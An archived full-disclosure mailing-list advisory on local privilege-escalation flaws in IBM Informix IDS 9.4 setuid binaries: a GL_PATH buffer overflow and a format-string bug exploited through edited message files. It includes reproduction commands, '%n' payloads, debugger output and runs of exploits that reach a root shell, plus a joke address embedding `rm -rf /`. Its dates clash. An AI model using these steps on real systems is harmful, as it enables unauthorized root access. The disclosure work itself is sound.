[VulnWatch] SRT2004-01-18-0747 - IBM Informix IDS 9.4 contains multiple vulnerabilities

From: KF (dotslash_at_snosoft.com)
Date: 03/14/03

  • Next message: KF: "[VulnWatch] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM"
    Date: Fri, 14 Mar 2003 01:18:51 -0500
    To: full-disclosure@lists.netsys.com
    
    
    

    
    

    Secure Network Operations, Inc. http://www.secnetops.com/research
    Strategic Reconnaissance Team research[at]secnetops[.]com
    Team Lead Contact kf[at]secnetops[.]com
    Spam Contact `rm -rf /`@snosoft.com

    Our Mission:
    ************************************************************************
    Secure Network Operations offers expertise in Networking, Intrusion
    Detection Systems (IDS), Software Security Validation, and
    Corporate/Private Network Security. Our mission is to facilitate a
    secure and reliable Internet and inter-enterprise communications
    infrastructure through the products and services we offer.

    To learn more about our company, products and services or to request a
    demo of ANVIL FCS please visit our site at http://www.secnetops.com, or
    call us at: 978-263-3829

    Quick Summary:
    ************************************************************************
    Advisory Number : SRT2004-01-18-0747
    Product : IBM Informix IDS
    Version : Version : 9.40.xC[12] (tested 9.40.UC1)
    Vendor : http://www-3.ibm.com/software/data/informix/
    Class : Local
    Criticality : High
    Operating System(s) : *nix

    Notice
    ************************************************************************
    1-2 day Early Warning List:
    ---------------------------
    Secure Network Operations, inc. will very shortly have its own advisory
    notification mailing list. This list will notify you of advisories 1-2
    days in advance of public release to other mailing lists. To subscribe
    please visit http://advisories.secnetops.com in the immediate future.

    30-60 day Early Warning List:
    -----------------------------
    Our early warning service will notify you of new vulnerabilities 30-60
    days in advance of public release. This service has been created to protect
    companies by allowing them to repair security vulnerabilities before they
    become public knowledge. To purchase a one year subscription to this
    service please contact us at 978-263-3767.

    Alert
    ***********************************************************************
    Our advisories will contain full details excluding a working Proof of
    Concept. Our web page will contain our working proof of concept for the
    advisory if it exists. Yes folks this is a policy change for us. We
    will exercise our own disgression in regards to delay of exploit release
    vs advisory release. List subscribers will have advanced access to working
    proof of concept code depending on the severity and list subscription type.

    Basic Explanation
    ************************************************************************
    High Level Description : IDS 9.4 contains multiple vulnerabilities

    What to do : Update to patch level IDS 9.40.UC3, 9.30.UC7
                              and 7.31.UD7 fix pack releases

    Basic Technical Details
    ************************************************************************
    Proof Of Concept Status : SNO has Proof of Concept.

    Low Level Description : Informix Dynamic Server 9.4 is a best-of-breed
    online transaction processing database for enterprise and workgroup
    computing. IDS is built on Dynamic Scalable Architecture that uses
    hardware resources more efficiently and minimizes hardware requirements.

    During routine product evalutation we noticed several setuid binaries
    that contained security issues. Our Informix installation came with the
    following setuid and setgid files:

    -rwsr-sr-- 1 root informix 10153315 Jul 19 12:30 ./oninit
    -rwsr-sr-x 1 root informix 1019813 Jul 19 12:30 ./onmode
    -rwsr-sr-x 1 root informix 1066468 Mar 15 11:47 ./onedcu
    -rwsr-sr-x 1 root informix 13443 Mar 15 11:46 ./ifmxgcore
    -rwsr-sr-x 1 root informix 1615730 Jul 19 12:30 ./ontape
    -rwsr-sr-x 1 root informix 1831430 Mar 15 11:51 ./ondblog
    -rwsr-sr-x 1 root informix 1897244 Jul 19 12:30 ./onbar_d
    -rwsr-sr-x 1 root informix 1909871 Jul 19 12:30 ./onsmsync
    -rwsr-sr-x 1 root informix 2143212 Jul 19 12:30 ./onmonitor
    -rwsr-sr-x 1 root informix 511534 Mar 15 11:53 ./sgidsh
    -rwsr-sr-x 1 root informix 511623 Mar 15 11:53 ./mkdbsdir
    -rwsr-sr-x 1 root informix 537232 Jul 19 12:30 ./onshowaudit
    -rwsr-sr-x 1 root informix 948490 Jul 19 12:30 ./onaudit
    -rwxr-sr-x 1 informix informix 1063801 Mar 15 11:47 ./xtree
    -rwxr-sr-x 1 informix informix 1196928 Jul 19 12:29 ./onspaces
    -rwxr-sr-x 1 informix informix 1199645 Jul 19 12:29 ./onparams
    -rwxr-sr-x 1 informix informix 1314460 Jul 19 12:29 ./onlog
    -rwxr-sr-x 1 informix informix 1438131 Jul 19 12:29 ./oncheck
    -rwxr-sr-x 1 informix informix 2235020 Jul 19 12:29 ./onpload
    -rwxr-sr-x 1 informix informix 3974843 Jul 19 12:29 ./onstat
    -rwxr-sr-x 1 informix informix 539519 Mar 15 11:47 ./onedpu
    -rwxr-sr-x 1 informix informix 895422 Jul 19 12:29 ./onload
    -rwxr-sr-x 1 informix informix 895424 Jul 19 12:29 ./onunload

    Most if not all of the binaries share common exploitable conditions.
    The first issue we noticed was a simple buffer overflow in the GL_PATH
    environment variable.

    [informix@vegeta bin]$ export GL_PATH=`perl -e 'print "A" x 998'`
    [informix@vegeta bin]$ ./xtree
    Segmentation fault

    A quick run in gdb shows us the following. Smaller string lengths reveal
    that this issue may be complicated because of a few free() calls.

    [root@vegeta bin]# export GL_PATH=`perl -e 'print "A" x 3068'`ABCD

    (gdb) i r
    eax 0x44434241 1145258561
    ecx 0x1 1
    edx 0x53 83
    ebx 0x401f21c0 1075782080
    esp 0xbfffcaf0 0xbfffcaf0
    ebp 0xbfffd1ac 0xbfffd1ac
    esi 0x44434241 1145258561
    edi 0xbfffcd4c -1073754804
    eip 0x401361db 0x401361db
    ...
    (gdb) bt
    #0 0x401751db in strlen () from /lib/libc.so.6
    #1 0x40144c7e in vfprintf () from /lib/libc.so.6
    #2 0x4015fb2c in vsprintf () from /lib/libc.so.6
    #3 0x4014d02d in sprintf () from /lib/libc.so.6
    #4 0x080a2138 in gl_path_search1 ()

    [informix@vegeta bin]$ for each in `find . -perm -2000 -user informix`
    > do
    > echo $each
    > $each
    > done
    ./onstat
    Segmentation fault
    ./onspaces
    Segmentation fault
    ./onparams
    Segmentation fault
    ./onload
    Segmentation fault
    ./oncheck
    Segmentation fault
    ./onunload
    Segmentation fault

    [informix@vegeta bin]$ for each in `find . -perm -4000`
    > do
    > echo $each
    > $each
    > done
    ./oninit
    Segmentation fault
    ./onmode
    Segmentation fault
    ./onedcu
    Segmentation fault
    ./onshowaudit
    Segmentation fault
    ./onaudit
    Segmentation fault
    ./onbar_d
    Segmentation fault
    ./ondblog
    Segmentation fault
    ./onsmsync
    Segmentation fault
    ./ontape
    Segmentation fault

    The next vulnerability we discovered is a bit more complex. When Informix
    binaries are run they begin to look for several message files. It looks for
    them in relation to the INFORMIXDIR environment variable.

    If we set INFORMIXDIR to /tmp we can see it begins searching /tmp for the
    necessary files.

    [root@vegeta bin]# export INFORMIXDIR=/tmp
    [root@vegeta bin]# strace ./onmonitor
    execve("./onmonitor", ["./onmonitor"], [/* 34 vars */]) = 0
    ...
    open("/tmp/en_us/0333.lco", O_RDONLY|O_LARGEFILE)
    open("/tmp/etc/informix.rc", O_RDONLY|O_LARGEFILE)
    open("/tmp/os/en_US.819", O_RDONLY|O_LARGEFILE)
    open("/tmp/registry", O_RDONLY)

    Depending on the application you are exploiting you will see that
    several files are searched for.

    Below we use /usr/informix/bin/oncheck as an example. We can see that it
    searches for olutil.iem.

    [root@vegeta informix]# bin/oncheck -cc aaa
    shared memory not initialized for INFORMIXSERVER '<NULL>'

    [root@vegeta bin]# strace bin/oncheck -cc aaa
    ...
    strcat("/usr/informix/msg/en_us/0333"..., "olutil.iem")
    access("/usr/informix/msg/en_us/0333"..., 4)
    lseek64(3, 37251, 0, 0, 0)
    read(3, "shared memory no"..., 55)
    strcpy(0x081da720, "shared memory no"...)
    printf("shared memory not initialized for INFORMIXSERV"...

    Since we control the INFORMIXDIR it is fairly trivial for us to inject
    format string messages into the printf() statements that are included
    in order to throw various error messages.

    Since INFORMIXDIR has a lot of critical items in it we must first make a
    copy of it. The easiest way of doing this is via multiple symlinks.

    [kf@vegeta kf]$ cd /tmp
    [kf@vegeta tmp]$ for each in `find /usr/informix/ -type d`; do mkdir -p ./$each ; done
    [kf@vegeta tmp]$ for each in `find /usr/informix`; do ln -s $each ./$each; done

    Since we need to edit the message file we will need to rm the link and
    copy the file into the correct location.

    [kf@vegeta tmp]$ rm usr/informix/msg/en_us/0333/olutil.iem
    [kf@vegeta tmp]$ cp /usr/informix/msg/en_us/0333/olutil.iem usr/informix/msg/en_us/0333/

    Using the above oncheck example we will need to edit the olutil.iem.

    Open up usr/informix/msg/en_us/0333/olutil.iem in vi and search for:
    shared memory not initialized for INFORMIXSERVER '<NULL>'

    As a test we can change the text to the following:
    ^@%x.%x. memory not initialized for INFORMIXSERVER '%s'

    Running the binary again shows that we have hit paydirt.
    [kf@vegeta tmp]$ bin/oncheck -cc aaa
    81da718.bfffda08. memory not initialized for INFORMIXSERVER '�jhC�'

    Obviously if we change the message to the following it becomes more
    interesting:
    %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n

    [kf@vegeta tmp]$ bin/oncheck -cc aaa
    Segmentation fault

    Gdb shows us the obvious...
    Program received signal SIGSEGV, Segmentation fault.
    0x40144f56 in vfprintf () from /lib/libc.so.6
    (gdb) bt
    #0 0x40144f56 in vfprintf () from /lib/libc.so.6
    #1 0x4014cfb2 in printf () from /lib/libc.so.6
    #2 0x0804b946 in main ()

    Strace shows us in detail what is going on.

    [080b1a11] strcat("/tmp/usr/informix/msg/en_us/0333"..., "olutil.iem")
    [080fc03b] access("/tmp/usr/informix/msg/en_us/0333"..., 4)
    [080d9613] lseek64(3, 37251, 0, 0, 0) = 37251
    [080d95f2] read(3, "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"..., 55) = 55
    [080b0207] strcpy(0x081da720, "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"...) = 0x081da720
    [0804b946] printf("%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"... <unfinished ...>
    [40144f56] --- SIGSEGV (Segmentation fault) ---
    [ffffffff] +++ killed by SIGSEGV +++

    We currently have two different Proof of Concept exploits for the above
    mentioned conditions. One takes gid informix and the other uid root.
    The data below shows a test run of each one.

    bash$ ./0x82-Local.InformixIDS -t0 -d /tmp/informix/ -g 999

      IBM Informix IDS 9.40 format string exploit.

      [+] Target Program: /usr/informix/bin/onparams
      [+] .dtors address: 0x81206ec
      [+] Shellcode address: 0xbfffffb3
      [+] flag and pad brute-force mode: (100:0)
      ...
      [*] Found it !!! (102:3)
      [*] Waiting shell ...

          ...
                                     ...
                                            81876d8
                       ...
                      0d for INFORMIXSERVER '(null)'
     sh-2.04$ id
     uid=500(x82) gid=999(informix) groups=500(x82)

    and

     bash$ ./0x82-InformixIDS_r00t -d /tmp/informix/

      IBM Informix IDS 9.40 format string local root exploit.

      [+] Target Program: /usr/informix/bin/ontape
      [+] .dtors address: 0x817c8e4
      [+] Shellcode address: 0xbfffffb3
      [+] flag and pad brute-force mode: (100:0)
      .......................................................
      [*] Found it !!! (212:0)
      [*] Waiting root shell ...

          ...
                                     ...
                                              bfff769c
                        ...
                   0guration file $INFORMIXDIR/etc/$ONCONFIG.

     Program over.
     sh-2.04# id
     uid=0(root) gid=0(root)

    Vendor Status : IBM addressed this issue in a prompt, efficient and intelligent manner.
                              Jonathan Leffler really stepped up to the plate so to speak, and provided
                              the SRT with more than enough information regarding this issue as well as
                              the actions taken to resolve this issue!

    Bugtraq URL : To be assigned.

    Disclaimer
    ----------------------------------------------------------------------
    This advisory was released by Secure Network Operations,Inc. as a matter
    of notification to help administrators protect their networks against
    the described vulnerability. Release of exploit code is done at our
    own discretion.
    ----------------------------------------------------------------------
    All content of this advisory is property of Secure Network Operations.
    ----------------------------------------------------------------------
    Secure Network Operations, Inc. || http://www.secnetops.com
    "Embracing the future of technology, protecting you."


  • Next message: KF: "[VulnWatch] SRT2004-01-17-0227 - BlackICE allows local users to become SYSTEM"

    Relevant Pages